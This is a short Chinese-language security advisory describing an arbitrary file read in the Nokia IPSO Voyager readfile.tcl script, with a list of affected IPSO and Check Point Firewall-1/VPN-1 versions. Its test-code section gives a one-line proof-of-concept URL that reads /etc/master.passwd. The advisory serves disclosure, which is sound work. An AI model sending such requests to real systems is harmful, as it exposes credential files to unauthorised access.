Nokia IPSO Voyager ReadFile.TCL远程文件读取漏洞

发布时间：2003-04-24
更新时间：2003-04-24
严重程度：中
威胁程度：读取受限文件
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：7426

受影响系统

Nokia IPSO 3.3 SP4
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
Nokia IPSO 3.3 SP3
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
Nokia IPSO 3.3 SP2
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
Nokia IPSO 3.3 SP1
   + Check Point Software Firewall-1 4.1 SP1
Nokia IPSO 3.3
   + Check Point Software Firewall-1 4.1
   + Check Point Software VPN-1 4.1
Nokia IPSO 3.3.1
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
Nokia IPSO 3.4
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
Nokia IPSO 3.4.1
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4
Nokia IPSO 3.4.2
   + Check Point Software Firewall-1 4.0
   + Check Point Software Firewall-1 4.0 SP1
   + Check Point Software Firewall-1 4.0 SP2
   + Check Point Software Firewall-1 4.0 SP3
   + Check Point Software Firewall-1 4.0 SP4
   + Check Point Software Firewall-1 4.0 SP5
   + Check Point Software Firewall-1 4.0 SP6
   + Check Point Software Firewall-1 4.0 SP7
   + Check Point Software Firewall-1 4.0 SP8
   + Check Point Software Firewall-1 4.1
   + Check Point Software Firewall-1 4.1 SP1
   + Check Point Software Firewall-1 4.1 SP2
   + Check Point Software Firewall-1 4.1 SP3
   + Check Point Software Firewall-1 4.1 SP4
   + Check Point Software Firewall-1 4.1 SP5
   + Check Point Software VPN-1 4.1
   + Check Point Software VPN-1 4.1 SP1
   + Check Point Software VPN-1 4.1 SP2
   + Check Point Software VPN-1 4.1 SP3
   + Check Point Software VPN-1 4.1 SP4

详细描述
Nokia IPSO不正确处理部分通过Voyager的通信，攻击者可以访问接口获得部分敏感信息。

问题由于 Nokia IPSO操作系统的webgui (Voyager)接口，其readfile.tcl脚本对用户请求缺少正确检查，可导致读取任意文件。

测试代码
http://x.x.x.x/cgi-bin/readfile.tcl?file=/etc/master.passwd

解决方案
尚无

相关信息
Jonas Eriksson <je@sekure.net>
参考：http://www.securityfocus.com/archive/1/319575

最近严重漏洞

Nokia IPSO Voyager ReadFile.TCL远程文件读取漏洞